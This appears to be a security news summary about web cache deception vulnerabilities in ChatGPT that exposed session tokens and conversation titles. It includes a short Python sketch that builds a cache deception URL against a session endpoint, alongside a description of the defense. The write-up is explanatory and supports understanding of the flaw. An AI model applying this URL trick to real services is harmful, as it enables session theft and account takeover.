Last week, OpenAI, the creator of ChatGPT, patched multiple severe vulnerabilities that could have allowed attackers to take over user accounts and view their conversations. The first was a critical web cache deception bug that could have exposed user information such as names, email addresses, and access tokens, which ChatGPT's web app fetches from a session endpoint on OpenAI's server. To exploit the vulnerability, an attacker could append a .css suffix to the session endpoint's path and send the resulting link to a victim; because the URL looked like a static file, the content delivery network would cache the victim's response, allowing the attacker to retrieve the cached session data afterwards.
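The trick above can be sketched in a few lines. This is a hypothetical illustration of how a web cache deception URL is built in general; the domain, endpoint path, and helper name are examples and not OpenAI's actual routes:

```python
def craft_cache_deception_url(base: str, endpoint: str, fake_ext: str = ".css") -> str:
    """Append a static-looking suffix so a CDN that keys caching
    decisions on file extension treats the dynamic response as a
    cacheable asset. The origin server may ignore the extra path
    segment and still return the authenticated user's session JSON,
    which the CDN then stores as if it were a stylesheet."""
    return f"{base}{endpoint}/nonexistent{fake_ext}"

# Example (illustrative endpoint, not a real OpenAI path):
url = craft_cache_deception_url("https://example.com", "/api/auth/session")
print(url)  # https://example.com/api/auth/session/nonexistent.css
```

Once a victim opens such a link while logged in, the attacker requests the same URL and receives the cached copy of the victim's response. The defense is to have the origin return cache-control headers that forbid caching of authenticated responses and to have the CDN respect them rather than keying on extension alone.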
Security researcher and CISO Ayoub Fathi then discovered a bypass that could be used against another ChatGPT API, giving an attacker access to a user's conversation titles. This was another web cache deception attack: once the response was cached, the attacker could harvest the victim's credentials and take over the account. Fathi worked with the OpenAI team to help fully address all of the issues.
No bug bounty reward was issued to either researcher, as OpenAI did not have a bug bounty program in place at the time. The vulnerabilities were reported just days after OpenAI took ChatGPT offline to address a bug in an open-source Redis client library that had exposed some users' chat titles and payment details to other users.
In conclusion, OpenAI patched several severe vulnerabilities that could have allowed attackers to take over user accounts and view conversations. The first was a web cache deception bug exposing session data, and the second was a bypass that provided access to a user's conversation titles. OpenAI has not issued any bug bounty rewards for the vulnerabilities.
Key Points:
- OpenAI patched multiple severe vulnerabilities that could have allowed attackers to take over user accounts and view conversations.
- The first vulnerability was a web cache deception bug and the second was a bypass method that provided access to a user’s conversation titles.
- OpenAI has not issued any bug bounty reward for the vulnerabilities.